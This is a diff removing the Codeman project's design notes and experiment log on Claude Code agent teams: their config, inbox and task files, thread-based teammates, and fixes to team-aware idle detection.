- Cross-reference with `~/.claude/teams/{name}/config.json` members
|
||||
|
||||
**Sub-subagents:** Teammates can spawn their own Task tool subagents, creating a 3-level hierarchy.
|
||||
|
||||
## Cleanup Behavior (Verified)
|
||||
|
||||
When the lead runs cleanup:
|
||||
1. Shutdown requests sent to all teammate inboxes
|
||||
2. Teammates shut down gracefully
|
||||
3. ALL filesystem artifacts deleted:
|
||||
- Inbox files and directory
|
||||
- Config.json
|
||||
- Team directory
|
||||
- All task files
|
||||
- Task directory
|
||||
4. Cleanup is atomic — all files removed in the same second
|
||||
|
||||
## Comparison with Subagents (Task tool)
|
||||
|
||||
| Aspect | Subagents (Task tool) | Agent Teams |
|
||||
|--------|----------------------|-------------|
|
||||
| Spawn method | Claude's built-in Task tool | Explicit team creation |
|
||||
| Process model | In-process threads | In-process threads (same!) |
|
||||
| Discovery | `subagents/agent-{id}.jsonl` only | BOTH subagent dir + `~/.claude/teams/` |
|
||||
| Communication | None (fire-and-forget) | Filesystem inboxes + SendMessage tool |
|
||||
| Shared state | None | Shared task list + inboxes |
|
||||
| Task tracking | Per-agent, no coordination | Shared with dependencies & ownership |
|
||||
| Lifecycle | Auto-cleanup on completion | Lead cleanup (deletes all artifacts) |
|
||||
| Sub-nesting | Can spawn sub-subagents | Teammates can spawn subagents too |
|
||||
| Cost | Lower (single context) | Higher (N context windows) |
|
||||
| Duration | Short-lived (seconds-minutes) | Longer-lived (minutes-hours) |
|
||||
|
||||
## Limitations
|
||||
|
||||
- No session resumption with in-process teammates (`/resume` doesn't restore them)
|
||||
- One team per session, no nested teams
|
||||
- Lead is fixed (cannot promote teammate)
|
||||
- Permissions set at spawn (change individually after)
|
||||
- Split panes require tmux or iTerm2 (not Screen)
|
||||
- Task status can lag (teammates may fail to mark complete)
|
||||
- Shutdown can be slow (waits for current tool call)
|
||||
|
||||
## Useful Commands
|
||||
|
||||
```bash
|
||||
# Check if teams exist
|
||||
ls ~/.claude/teams/
|
||||
|
||||
# Check team config
|
||||
cat ~/.claude/teams/{name}/config.json | jq .
|
||||
|
||||
# Check teammate inboxes
|
||||
cat ~/.claude/teams/{name}/inboxes/{teammate}.json | jq .
|
||||
|
||||
# Check team tasks
|
||||
ls ~/.claude/tasks/{name}/
|
||||
for f in ~/.claude/tasks/{name}/*.json; do cat "$f" | jq .; done
|
||||
|
||||
# Count Claude processes (teammates are threads, not processes)
|
||||
ps aux | grep '[c]laude' | grep -v grep
|
||||
|
||||
# Check subagent detection of teammates
|
||||
curl -s http://localhost:3000/api/subagents | jq '.data[] | select(.description | startswith("<teammate"))'
|
||||
|
||||
# Team interaction (in-process mode)
|
||||
# Shift+Up/Down: Switch between teammates
|
||||
# Enter: View teammate session
|
||||
# Escape: Interrupt teammate's turn
|
||||
# Ctrl+T: Toggle task list
|
||||
```
|
||||
@@ -1,171 +0,0 @@
|
||||
# Codeman Agent Teams Integration — Design (Approach C: Hybrid)
|
||||
|
||||
> Updated 2026-02-12 with experiment findings. See `experiment-log.md` for raw data.
|
||||
|
||||
## Overview
|
||||
|
||||
Approach C combines filesystem monitoring (for team/task discovery and inbox watching) with the existing subagent-watcher (for live transcript tailing) and adjusted idle detection (to account for active teammates). The key finding from our experiment is that **teammates already appear as standard subagents**, so most infrastructure exists — we mainly need team awareness and idle detection fixes.
|
||||
|
||||
## Components
|
||||
|
||||
### 1. TeamWatcher (`src/team-watcher.ts`)
|
||||
|
||||
Monitors `~/.claude/teams/` for team creation/removal and tracks active teams.
|
||||
|
||||
**Discovery mechanism:**
|
||||
- Poll `~/.claude/teams/` for directories (team names) every 3-5 seconds
|
||||
- When found: parse `config.json` to get:
|
||||
- `leadSessionId` → map to Codeman session
|
||||
- `members` array → teammate names, agentIds, colors, models
|
||||
- Watch for directory deletion (cleanup signal)
|
||||
|
||||
**CORRECTED from pre-experiment design:**
|
||||
- ~~Each teammate has a separate Claude Code process~~ → Teammates are **in-process threads**, not separate processes
|
||||
- ~~Find via `ps aux` + `/proc` PID matching~~ → Not needed, no separate PIDs
|
||||
- Teammate transcripts are at `subagents/agent-{id}.jsonl` (standard subagent path), NOT separate session transcripts
|
||||
|
||||
**Association:**
|
||||
- `config.json.leadSessionId` → Codeman session ID (direct match!)
|
||||
- Each member's `agentId` (e.g., `fs-researcher@research-watchers`) → links to subagent files
|
||||
- `agentType: "team-lead"` vs `"general-purpose"` distinguishes lead from teammates
|
||||
|
||||
**Inbox monitoring:**
|
||||
- Watch `~/.claude/teams/{name}/inboxes/` for new messages
|
||||
- Each teammate has a JSON file with message array
|
||||
- Messages are double-encoded JSON with `from`, `text`, `timestamp`, `read` fields
|
||||
- Message types: `task_assignment`, `shutdown_request`, `shutdown_response`
|
||||
|
||||
### 2. Team-Aware Idle Detection (HIGHEST PRIORITY)
|
||||
|
||||
**Problem (confirmed by experiment):** Lead session shows status "idle" in Codeman while teammates are actively working. Token count continues climbing but Codeman thinks the session is inactive.
|
||||
|
||||
**Solution:**
|
||||
- Before declaring a session idle, check if it's a team lead
|
||||
- If team lead: check `~/.claude/teams/*/config.json` for this session's `leadSessionId`
|
||||
- If active team exists: check task files in `~/.claude/tasks/{team-name}/`
|
||||
- Any task with `status: "in_progress"` → suppress idle detection
|
||||
- All tasks `completed` AND no non-`_internal` tasks pending → allow idle
|
||||
- Fallback: check subagent-watcher for active subagents on this session
|
||||
|
||||
**Integration points:**
|
||||
- `src/ai-idle-checker.ts` — add team-awareness check before AI idle analysis
|
||||
- `src/respawn-controller.ts` — consult TeamWatcher before transitioning to idle states
|
||||
- `src/session.ts` — expose `hasActiveTeam()` method
|
||||
|
||||
**Liveness check (simplified from pre-experiment):**
|
||||
- ~~Check `/proc/{pid}` existence~~ → Not needed (no separate processes)
|
||||
- Check task file status instead (filesystem-based)
|
||||
- Check subagent-watcher for active subagents under this session
|
||||
|
||||
### 3. Shared Task List UI
|
||||
|
||||
**Display:** New panel in web UI showing the team's shared task list.
|
||||
|
||||
**Data source:** Poll `~/.claude/tasks/{team-name}/` for task JSON files.
|
||||
|
||||
**Task file structure (verified):**
|
||||
```json
|
||||
{
|
||||
"id": "1",
|
||||
"subject": "Research Node.js fs.watch",
|
||||
"description": "Full description...",
|
||||
"activeForm": "Researching Node.js fs.watch",
|
||||
"status": "in_progress", // pending | in_progress | completed
|
||||
"blocks": [],
|
||||
"blockedBy": [],
|
||||
"owner": "fs-researcher" // Empty string = unassigned
|
||||
}
|
||||
```
|
||||
|
||||
Internal tracking tasks: `{ "metadata": { "_internal": true } }` — filter these from display.
|
||||
|
||||
**UI elements:**
|
||||
- Task subject, status badge (color-coded), owner (teammate name with color)
|
||||
- Dependency visualization (blockedBy indicators)
|
||||
- Progress bar (completed / total non-internal tasks)
|
||||
- Real-time updates via SSE
|
||||
|
||||
**API endpoint:** `GET /api/sessions/:id/team-tasks` → returns parsed task files
|
||||
|
||||
**Locking:** Respect `.lock.lock` directory lock when reading (skip if locked, retry next poll).
|
||||
|
||||
### 4. Teammate Display
|
||||
|
||||
**Decision: Option A — Enhanced subagent floating windows.**
|
||||
|
||||
Since teammates already appear as subagents in the existing infrastructure, we enhance rather than replace:
|
||||
|
||||
- **Badge:** Add "Teammate" badge to subagent windows for agents matching team config
|
||||
- **Color:** Use teammate's `color` field from config.json (blue, green, yellow)
|
||||
- **Name:** Show teammate name instead of agent ID
|
||||
- **Persistence:** Teammate windows should stay open longer (they're longer-lived than regular subagents)
|
||||
- **Status:** Show task assignment and progress from task files
|
||||
|
||||
**Detection logic:**
|
||||
```
|
||||
For each subagent detected by subagent-watcher:
|
||||
1. Check if description starts with "<teammate-message"
|
||||
2. OR cross-reference agentId with active team config members
|
||||
3. If match → apply teammate badge, color, name
|
||||
```
|
||||
|
||||
### 5. Inbox/Message Display
|
||||
|
||||
**CORRECTED: Inboxes ARE filesystem-based.**
|
||||
|
||||
Communication uses filesystem inbox files at `~/.claude/teams/{name}/inboxes/{teammate}.json`. We can:
|
||||
|
||||
1. **Watch inbox files** for real-time message monitoring
|
||||
2. **Parse message types** for display:
|
||||
- `task_assignment` → "Lead assigned Task #1 to fs-researcher"
|
||||
- `shutdown_request` → "Lead requested shutdown"
|
||||
- `shutdown_response` → "Teammate confirmed shutdown"
|
||||
3. **Display as timeline** in team panel
|
||||
|
||||
**Potential for interaction (not tested, future work):**
|
||||
- Write to teammate inbox files to inject messages
|
||||
- Must respect `.json.lock` directory locking protocol
|
||||
- Could enable "nudge" or "redirect" functionality from Codeman UI
|
||||
|
||||
## Answered Questions (from experiment)
|
||||
|
||||
| # | Question | Answer |
|
||||
|---|----------|--------|
|
||||
| 1 | Teammates in subagents dir? | **YES** — standard `subagents/agent-{id}.jsonl` path |
|
||||
| 2 | subagent-watcher detects them? | **YES** — automatically, no changes needed |
|
||||
| 3 | Task file structure? | Numbered JSON files with subject, status, owner, dependencies |
|
||||
| 4 | Env var inheritance? | **YES** — in-process threads share parent's env |
|
||||
| 5 | Processes per teammate? | **ZERO** — threads, not processes |
|
||||
| 6 | config.json format? | Rich: name, agentId, agentType, model, prompt, color, backendType |
|
||||
| 7 | Interact via stdin? | N/A (threads) — can interact via inbox files instead |
|
||||
| 8 | In-process under Screen? | Works fine — single claude process, threads handle teammates |
|
||||
| 9 | Hook events from teammates? | TeammateIdle + TaskCompleted hooks available in settings schema |
|
||||
| 10 | Process tree? | Single process with threads — no child processes |
|
||||
|
||||
## Existing Infrastructure to Leverage
|
||||
|
||||
| Component | Reuse for | Status |
|
||||
|-----------|-----------|--------|
|
||||
| `subagent-watcher.ts` | Teammate transcript tailing | **Already works** |
|
||||
| Subagent floating windows (`app.js`) | Teammate activity display | **Already works** (needs badges) |
|
||||
| `task-tracker.ts` | Background task tracking patterns | Reuse patterns |
|
||||
| LRUMap, StaleExpirationMap | Bounded caches for team state | Available |
|
||||
| SSE broadcast | Real-time UI updates | Available |
|
||||
| ~~`/proc` PID checking~~ | ~~Teammate liveness~~ | **Not needed** (threads) |
|
||||
| `file-stream-manager.ts` | Watch inbox/task files | Available |
|
||||
|
||||
## Implementation Order (Revised)
|
||||
|
||||
1. **Team-aware idle detection** — prevent premature respawn/auto-compact (CRITICAL)
|
||||
2. **TeamWatcher** — poll `~/.claude/teams/`, parse config.json, track active teams
|
||||
3. **Teammate badge in subagent windows** — mark teammate subagents with name/color
|
||||
4. **Team tasks API + UI** — `GET /api/sessions/:id/team-tasks` + task list panel
|
||||
5. **Inbox monitoring** — watch inbox files, display message timeline
|
||||
6. **TeammateIdle/TaskCompleted hooks** — add to Codeman's hooks config generator
|
||||
|
||||
## What We DON'T Need to Build
|
||||
|
||||
- ~~Process discovery for teammates~~ (they're threads)
|
||||
- ~~Custom transcript tailing~~ (subagent-watcher handles it)
|
||||
- ~~Separate teammate window infrastructure~~ (subagent windows work)
|
||||
- ~~Message interception via transcript parsing~~ (inbox files are simpler)
|
||||
@@ -1,468 +0,0 @@
|
||||
# Agent Teams Experiment Log
|
||||
|
||||
> Experiment date: 2026-02-12
|
||||
> Test case: `~/codeman-cases/agent-teams-test/`
|
||||
> Team name: `research-watchers`
|
||||
> Teammates: 3 (fs-researcher, perf-researcher, api-researcher)
|
||||
> Lead session: `461daa80-94ec-4e5e-a1bb-0518f78311bc`
|
||||
> Duration: ~3 minutes (06:45:01 → 06:48:07)
|
||||
|
||||
## Pre-Experiment State
|
||||
|
||||
```
|
||||
~/.claude/teams/ — did NOT exist
|
||||
~/.claude/tasks/ — 75 UUID-named directories (from regular Task tool subagents)
|
||||
Claude processes — 7 (including watchers)
|
||||
settings.local.json — edited to add CLAUDE_CODE_EXPERIMENTAL_AGENT_TEAMS=1
|
||||
```
|
||||
|
||||
## Experiment Prompt
|
||||
|
||||
```
|
||||
Create an agent team with 3 teammates to research the following topics in parallel:
|
||||
Teammate 1 fs-researcher researches how Node.js fs.watch works on Linux vs macOS.
|
||||
Teammate 2 perf-researcher researches inotify performance limits and alternatives.
|
||||
Teammate 3 api-researcher researches the inotifywait command-line API.
|
||||
Have each teammate write a brief summary of their findings in a separate file.
|
||||
Name the team research-watchers.
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Question 1: What exact filesystem artifacts do agent teams create?
|
||||
|
||||
**Expected:** `~/.claude/teams/research-watchers/config.json` and `~/.claude/tasks/research-watchers/`
|
||||
|
||||
**Actual: CONFIRMED + SURPRISE inboxes/ directory**
|
||||
|
||||
```
|
||||
~/.claude/teams/research-watchers/
|
||||
├── config.json # Team config (members, lead, metadata)
|
||||
└── inboxes/ # Filesystem-based messaging!
|
||||
├── api-researcher.json # Per-teammate inbox
|
||||
├── fs-researcher.json
|
||||
├── perf-researcher.json
|
||||
└── team-lead.json # Lead also has an inbox
|
||||
|
||||
~/.claude/tasks/research-watchers/
|
||||
├── .lock # Empty file (presence = lock indicator?)
|
||||
├── 1.json # Task: Research Node.js fs.watch
|
||||
├── 2.json # Task: Research inotify performance
|
||||
├── 3.json # Task: Research inotifywait CLI
|
||||
├── 4.json # Internal: fs-researcher spawn tracking
|
||||
├── 5.json # Internal: perf-researcher spawn tracking
|
||||
└── 6.json # Internal: api-researcher spawn tracking
|
||||
```
|
||||
|
||||
Subagent transcripts also appear in the standard subagent directory:
|
||||
```
|
||||
~/.claude/projects/-home-arkon-codeman-cases-agent-teams-test/
|
||||
└── 461daa80.../
|
||||
├── 461daa80...jsonl # Lead session transcript
|
||||
└── subagents/
|
||||
├── agent-ae50544.jsonl # Teammate: fs-researcher
|
||||
├── agent-aa20c65.jsonl # Teammate: perf-researcher
|
||||
├── agent-a29de32.jsonl # Teammate: api-researcher
|
||||
├── agent-a04968e.jsonl # Sub-subagent (teammate's Task tool)
|
||||
├── agent-a0d372e.jsonl # Sub-subagent
|
||||
├── agent-a2ff939.jsonl # Sub-subagent
|
||||
├── agent-a89ad82.jsonl # Sub-subagent
|
||||
├── agent-aa1efc7.jsonl # Sub-subagent
|
||||
└── agent-ab0ef07.jsonl # Sub-subagent
|
||||
```
|
||||
|
||||
**Cleanup:** At 06:48:02, the lead deleted ALL artifacts — inboxes, config, tasks, the team directory itself. Clean removal.
|
||||
|
||||
---
|
||||
|
||||
## Question 2: Is the mailbox/communication filesystem-based or tool-based?
|
||||
|
||||
**Expected:** Tool-based (SendMessage tool), NOT filesystem
|
||||
|
||||
**Actual: BOTH! Hybrid — tool triggers filesystem writes.**
|
||||
|
||||
Communication uses the `SendMessage` tool internally, but the actual message delivery is via **filesystem inbox files**. Each teammate has `~/.claude/teams/{name}/inboxes/{teammate}.json` containing a JSON array of messages.
|
||||
|
||||
**Inbox message format:**
|
||||
```json
|
||||
[
|
||||
{
|
||||
"from": "team-lead",
|
||||
"text": "{\"type\":\"task_assignment\",\"taskId\":\"1\",\"subject\":\"Research Node.js fs.watch...\",\"assignedBy\":\"team-lead\",\"timestamp\":\"...\"}",
|
||||
"timestamp": "2026-02-12T05:45:18.176Z",
|
||||
"read": false
|
||||
}
|
||||
]
|
||||
```
|
||||
|
||||
Key observations:
|
||||
- `text` field is a **JSON string** (double-encoded) containing a typed message object
|
||||
- Message types observed: `task_assignment`, `shutdown_request`, `shutdown_response`
|
||||
- `read` field tracks whether teammate has processed the message (false → true)
|
||||
- **File locking** via `.json.lock` directories (mkdir-based atomic lock, created then deleted)
|
||||
- Lead also has an inbox (`team-lead.json`) for receiving messages FROM teammates
|
||||
|
||||
**Implication for Codeman:** We CAN intercept messages by watching inbox JSON files! We can also potentially inject messages by writing to inbox files.
|
||||
|
||||
---
|
||||
|
||||
## Question 3: Do teammates appear in the subagents directory?
|
||||
|
||||
**Expected:** Unclear
|
||||
|
||||
**Actual: YES! Teammates appear as standard subagents.**
|
||||
|
||||
Teammates create transcript files at:
|
||||
```
|
||||
~/.claude/projects/{hash}/{leadSessionId}/subagents/agent-{agentId}.jsonl
|
||||
```
|
||||
|
||||
This is the **exact same path pattern** that regular Task tool subagents use. The existing `subagent-watcher.ts` successfully discovers them.
|
||||
|
||||
Codeman's `/api/subagents` endpoint returned them with status "active":
|
||||
```
|
||||
Agent: ae50544 Status: active Tools: 8 Model: claude-opus-4-6
|
||||
Desc: <teammate-message teammate_id= team
|
||||
Agent: aa20c65 Status: active Tools: 9 Model: claude-opus-4-6
|
||||
Desc: <teammate-message teammate_id= team
|
||||
Agent: a29de32 Status: active Tools: 7 Model: claude-opus-4-6
|
||||
Desc: <teammate-message teammate_id= team
|
||||
```
|
||||
|
||||
**Distinguishing teammates from regular subagents:**
|
||||
- Description starts with `<teammate-message teammate_id= team` (a unique marker)
|
||||
- We can also cross-reference with `~/.claude/teams/{name}/config.json` members list
|
||||
|
||||
**Sub-subagents:** Teammates can spawn their own Task tool subagents. 3 teammates spawned 6 additional subagent files (9 total in the subagents directory).
|
||||
|
||||
---
|
||||
|
||||
## Question 4: What does config.json actually look like?
|
||||
|
||||
**Actual config.json (with all 3 teammates):**
|
||||
|
||||
```json
|
||||
{
|
||||
"name": "research-watchers",
|
||||
"description": "Research team investigating file watching mechanisms...",
|
||||
"createdAt": 1770875105373,
|
||||
"leadAgentId": "team-lead@research-watchers",
|
||||
"leadSessionId": "461daa80-94ec-4e5e-a1bb-0518f78311bc",
|
||||
"members": [
|
||||
{
|
||||
"agentId": "team-lead@research-watchers",
|
||||
"name": "team-lead",
|
||||
"agentType": "team-lead",
|
||||
"model": "claude-opus-4-6",
|
||||
"joinedAt": 1770875105373,
|
||||
"tmuxPaneId": "",
|
||||
"cwd": "/home/arkon/codeman-cases/agent-teams-test",
|
||||
"subscriptions": []
|
||||
},
|
||||
{
|
||||
"agentId": "fs-researcher@research-watchers",
|
||||
"name": "fs-researcher",
|
||||
"agentType": "general-purpose",
|
||||
"model": "claude-opus-4-6",
|
||||
"prompt": "You are \"fs-researcher\" on the \"research-watchers\" team...",
|
||||
"color": "blue",
|
||||
"planModeRequired": false,
|
||||
"joinedAt": 1770875126680,
|
||||
"tmuxPaneId": "in-process",
|
||||
"cwd": "/home/arkon/codeman-cases/agent-teams-test",
|
||||
"subscriptions": [],
|
||||
"backendType": "in-process"
|
||||
},
|
||||
{
|
||||
"agentId": "perf-researcher@research-watchers",
|
||||
"name": "perf-researcher",
|
||||
"agentType": "general-purpose",
|
||||
"model": "claude-opus-4-6",
|
||||
"prompt": "...",
|
||||
"color": "green",
|
||||
"planModeRequired": false,
|
||||
"joinedAt": 1770875130344,
|
||||
"tmuxPaneId": "in-process",
|
||||
"cwd": "/home/arkon/codeman-cases/agent-teams-test",
|
||||
"subscriptions": [],
|
||||
"backendType": "in-process"
|
||||
},
|
||||
{
|
||||
"agentId": "api-researcher@research-watchers",
|
||||
"name": "api-researcher",
|
||||
"agentType": "general-purpose",
|
||||
"model": "claude-opus-4-6",
|
||||
"prompt": "...",
|
||||
"color": "yellow",
|
||||
"planModeRequired": false,
|
||||
"joinedAt": 1770875134997,
|
||||
"tmuxPaneId": "in-process",
|
||||
"cwd": "/home/arkon/codeman-cases/agent-teams-test",
|
||||
"subscriptions": [],
|
||||
"backendType": "in-process"
|
||||
}
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
**Key fields per member:**
|
||||
- `agentId`: `{name}@{teamName}` format
|
||||
- `agentType`: `"team-lead"` for lead, `"general-purpose"` for teammates
|
||||
- `model`: Model used (inherits from lead)
|
||||
- `prompt`: Full spawn prompt (only for teammates)
|
||||
- `color`: UI color assignment (blue, green, yellow)
|
||||
- `backendType`: `"in-process"` for in-process mode
|
||||
- `tmuxPaneId`: `"in-process"` or actual pane ID for tmux mode
|
||||
- `subscriptions`: Empty array (possibly for message routing)
|
||||
|
||||
**Config grows incrementally** — starts with just lead member (620 bytes), grows as teammates are added (→ 1886 → 3188 → 4551 bytes).
|
||||
|
||||
---
|
||||
|
||||
## Question 5: How do shared tasks differ from regular tasks?
|
||||
|
||||
**Expected:** Team name directory vs UUID, richer task format
|
||||
|
||||
**Actual: CONFIRMED**
|
||||
|
||||
**Team tasks (`~/.claude/tasks/research-watchers/`):**
|
||||
```json
|
||||
{
|
||||
"id": "1",
|
||||
"subject": "Research Node.js fs.watch on Linux vs macOS",
|
||||
"description": "Research how Node.js fs.watch works differently...",
|
||||
"activeForm": "Researching Node.js fs.watch Linux vs macOS",
|
||||
"status": "in_progress",
|
||||
"blocks": [],
|
||||
"blockedBy": [],
|
||||
"owner": "fs-researcher"
|
||||
}
|
||||
```
|
||||
|
||||
**Internal teammate tracking tasks (4.json, 5.json, 6.json):**
|
||||
```json
|
||||
{
|
||||
"id": "4",
|
||||
"subject": "fs-researcher",
|
||||
"description": "You are \"fs-researcher\" on the \"research-watchers\" team...",
|
||||
"status": "in_progress",
|
||||
"blocks": [],
|
||||
"blockedBy": [],
|
||||
"metadata": { "_internal": true }
|
||||
}
|
||||
```
|
||||
|
||||
**Key differences from regular subagent tasks (`~/.claude/tasks/{UUID}/`):**
|
||||
| Feature | Regular tasks | Team tasks |
|
||||
|---------|--------------|------------|
|
||||
| Directory name | UUID | Human-readable team name |
|
||||
| File names | `.lock`, `.highwatermark` only | Numbered JSON files (1.json, 2.json...) |
|
||||
| Content | Lock files only (no task JSON) | Full task JSON with metadata |
|
||||
| Owner field | N/A | Teammate name |
|
||||
| Locking | `.lock` file | `.lock.lock` directory (mkdir atomic) |
|
||||
| Internal tasks | None | `_internal: true` for teammate spawn tracking |
|
||||
|
||||
---
|
||||
|
||||
## Question 6: Can we write to task/mailbox files to interact with teammates?
|
||||
|
||||
**Expected:** Possibly for tasks, no for messages
|
||||
|
||||
**Actual: LIKELY YES for both**
|
||||
|
||||
Evidence supporting external writes:
|
||||
1. **Inbox files** are plain JSON arrays — we could append messages
|
||||
2. **Task files** are plain JSON — we could modify status, add new tasks
|
||||
3. **File locking** uses `.json.lock` directories — we'd need to respect the locking protocol
|
||||
4. **Lock protocol**: Create directory `{file}.lock` → write → delete directory. Simple mkdir-based atomic lock.
|
||||
|
||||
**Not tested in this experiment** — would need a follow-up test to verify teammates actually pick up externally-added messages/tasks. But the format is clear and the locking is simple.
|
||||
|
||||
---
|
||||
|
||||
## Question 7: What happens to Codeman's idle detection with active teammates?
|
||||
|
||||
**Expected:** Lead may appear idle while teammates work
|
||||
|
||||
**Actual: Lead stays "idle" in Codeman's view, but terminal shows active status**
|
||||
|
||||
Observations:
|
||||
- Codeman session status showed `"idle"` throughout the experiment
|
||||
- The terminal output continued updating (task list checkboxes, teammate progress messages)
|
||||
- Lead displayed "Befuddling..." spinner while waiting for teammates
|
||||
- Token count climbed from 27k → 33k during the experiment
|
||||
- The `stop` hook DID fire at the end when the team was cleaned up
|
||||
|
||||
**Implication:** Current idle detection may trigger prematurely if:
|
||||
- It only checks Codeman's session status (which stays "idle")
|
||||
- It doesn't account for active teammates
|
||||
|
||||
**What we need:** Check `~/.claude/teams/*/config.json` for active members before declaring idle.
|
||||
|
||||
---
|
||||
|
||||
## Question 8: How many Claude processes spawn per teammate?
|
||||
|
||||
**Expected:** 1 claude process per teammate
|
||||
|
||||
**Actual: ZERO separate processes! Teammates are in-process threads.**
|
||||
|
||||
```
|
||||
# Only 2 claude processes (both Codeman sessions, none for teammates):
|
||||
25405 claude --dangerously-skip-permissions --session-id 236f004f... (our main session)
|
||||
383633 claude --dangerously-skip-permissions --session-id 461daa80... (test session + 3 teammates)
|
||||
|
||||
# Process tree for test session:
|
||||
claude(383633)─┬─{claude}(383635)
|
||||
├─{claude}(383636)
|
||||
├─... (22 threads total)
|
||||
└─{claude}(399252)
|
||||
```
|
||||
|
||||
**In-process mode = threads, not processes.** All 3 teammates run as threads within the single `claude` process (PID 383633). This explains:
|
||||
- No separate PIDs to track
|
||||
- No `/proc/{pid}/environ` for individual teammates
|
||||
- Lower resource overhead
|
||||
- Shared env vars automatically
|
||||
|
||||
---
|
||||
|
||||
## Question 9: Do teammates inherit Codeman env vars (hook events)?
|
||||
|
||||
**Expected:** Yes, if child processes
|
||||
|
||||
**Actual: YES, trivially — they're in-process threads**
|
||||
|
||||
Since teammates are threads in the lead's process (PID 383633), they share the exact same environment:
|
||||
```
|
||||
CODEMAN_SCREEN=1
|
||||
CODEMAN_SESSION_ID=461daa80-94ec-4e5e-a1bb-0518f78311bc
|
||||
CODEMAN_SCREEN_NAME=codeman-461daa80
|
||||
CODEMAN_API_URL=http://localhost:3000
|
||||
```
|
||||
|
||||
The `CLAUDE_CODE_EXPERIMENTAL_AGENT_TEAMS=1` env var was set via `settings.local.json`'s `env` key, which Claude Code reads at startup and sets on its process.
|
||||
|
||||
**Hook events:** The lead session's hooks (Notification, Stop) apply to the whole process. Teammate-specific hooks (`TeammateIdle`, `TaskCompleted`) are defined in the same `settings.local.json` and would fire for the lead's session.
|
||||
|
||||
---
|
||||
|
||||
## Question 10: Does subagent-watcher pick up teammates automatically?
|
||||
|
||||
**Expected:** Probably not
|
||||
|
||||
**Actual: YES! subagent-watcher detects teammates automatically.**
|
||||
|
||||
Teammates create transcript files in the standard subagent path:
|
||||
```
|
||||
~/.claude/projects/{hash}/{leadSessionId}/subagents/agent-{id}.jsonl
|
||||
```
|
||||
|
||||
Codeman's `/api/subagents` endpoint returned all 3 teammates as active subagents. They're indistinguishable from regular Task tool subagents except:
|
||||
1. Their `description` field starts with `<teammate-message teammate_id= team`
|
||||
2. They can be cross-referenced with `~/.claude/teams/{name}/config.json`
|
||||
3. They tend to be longer-lived than regular subagents
|
||||
|
||||
**Sub-subagents:** Teammates also spawn their own Task tool subagents (6 additional agents detected), creating a 3-level hierarchy: Lead → Teammates → Sub-subagents.
|
||||
|
||||
---
|
||||
|
||||
## Filesystem Event Timeline
|
||||
|
||||
```
|
||||
06:45:01 Session transcript created
|
||||
06:45:05 ~/.claude/teams/ created
|
||||
06:45:05 ~/.claude/teams/research-watchers/ created
|
||||
06:45:05 config.json created (lead member only, 620 bytes)
|
||||
06:45:05 ~/.claude/tasks/research-watchers/ created with .lock
|
||||
06:45:11 Task 1.json created (via .lock.lock directory lock)
|
||||
06:45:13 Task 2.json created
|
||||
06:45:15 Task 3.json created
|
||||
06:45:18 inboxes/ directory created
|
||||
06:45:18 fs-researcher.json inbox created (task_assignment message)
|
||||
06:45:18 perf-researcher.json inbox created
|
||||
06:45:19 api-researcher.json inbox created
|
||||
06:45:26 config.json updated (fs-researcher added, 1886 bytes)
|
||||
06:45:26 Subagent agent-ae50544.jsonl created (fs-researcher)
|
||||
06:45:26 Task 4.json created (internal: fs-researcher tracking)
|
||||
06:45:30 config.json updated (perf-researcher added, 3188 bytes)
|
||||
06:45:30 Subagent agent-aa20c65.jsonl created (perf-researcher)
|
||||
06:45:30 Task 5.json created (internal: perf-researcher tracking)
|
||||
06:45:34 config.json updated (api-researcher added, 4551 bytes)
|
||||
06:45:34 Task 6.json created (internal: api-researcher tracking)
|
||||
06:45:35 Subagent agent-a29de32.jsonl created (api-researcher)
|
||||
06:45:35+ Teammates working, additional subagent transcripts appearing
|
||||
06:47:xx Tasks completed, shutdown_requests sent to teammate inboxes
|
||||
06:47:56 team-lead.json inbox created (teammates reporting back)
|
||||
06:47:57 config.json updated multiple times (member removal?)
|
||||
06:48:02 CLEANUP: all inbox files deleted
|
||||
06:48:02 CLEANUP: inboxes/ directory deleted
|
||||
06:48:02 CLEANUP: config.json deleted
|
||||
06:48:02 CLEANUP: research-watchers team directory deleted
|
||||
06:48:02 CLEANUP: all task files deleted (1-6.json + .lock)
|
||||
06:48:02 CLEANUP: research-watchers task directory deleted
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Web UI Observations
|
||||
|
||||
**Terminal output:**
|
||||
- Task list appears with checkboxes: `☐ Research Node.js fs.watch on Linux vs macOS`
|
||||
- Checkboxes fill in as tasks complete: `☑ Research Node.js fs.watch...`
|
||||
- Each task shows assigned teammate: `(@fs-researcher)`
|
||||
- Spinner shows active teammate with progress
|
||||
|
||||
**Status bar:**
|
||||
- Shows team member selector: `@main @api-researcher @fs-researcher @perf-researcher`
|
||||
- Hint: `shift+↑ to expand` and `ctrl+t to show teammates`
|
||||
- Standard bypass permissions and token count still visible
|
||||
|
||||
**Subagent floating windows:**
|
||||
- Teammates DID appear as subagent floating windows in Codeman's web UI
|
||||
- They show the standard subagent info (model, tool calls, description)
|
||||
- Sub-subagents (teammates' own Task tool usage) also appear
|
||||
|
||||
**In-process mode specifics:**
|
||||
- No new terminal windows or panes
|
||||
- Everything renders in the single terminal session
|
||||
- Shift+Up/Down would switch between teammate views (not tested interactively)
|
||||
|
||||
---
|
||||
|
||||
## Conclusions & Key Surprises
|
||||
|
||||
### Surprises vs expectations
|
||||
|
||||
1. **Inboxes ARE filesystem-based** — contrary to docs saying "SendMessage tool". It's a hybrid: the tool writes to filesystem inboxes.
|
||||
2. **Teammates are threads, not processes** — no new OS processes, just threads within the lead's claude process.
|
||||
3. **Teammates appear as standard subagents** — existing subagent-watcher infrastructure works out of the box!
|
||||
4. **Config grows incrementally** — members are added one-by-one, not all at once.
|
||||
5. **Internal tracking tasks** — tasks 4-6 with `_internal: true` track teammate spawn state.
|
||||
6. **Auto-cleanup** — lead automatically cleaned up ALL artifacts after shutdown.
|
||||
7. **Sub-subagents** — teammates can spawn their own Task tool subagents (3-level hierarchy).
|
||||
8. **`teammateMode` is NOT a valid settings key** — display mode defaults to `in-process`.
|
||||
|
||||
### Design implications for Codeman
|
||||
|
||||
1. **TeamWatcher can be simple** — just poll `~/.claude/teams/` for directories + parse config.json
|
||||
2. **Subagent-watcher already works** — no new infrastructure needed for teammate transcript tailing
|
||||
3. **Idle detection needs team awareness** — check config.json members before declaring idle
|
||||
4. **Message interception is possible** — watch inbox JSON files for real-time message tracking
|
||||
5. **Task visualization is straightforward** — parse numbered JSON files in task directory
|
||||
6. **No process tracking needed** — teammates are threads, not separate processes
|
||||
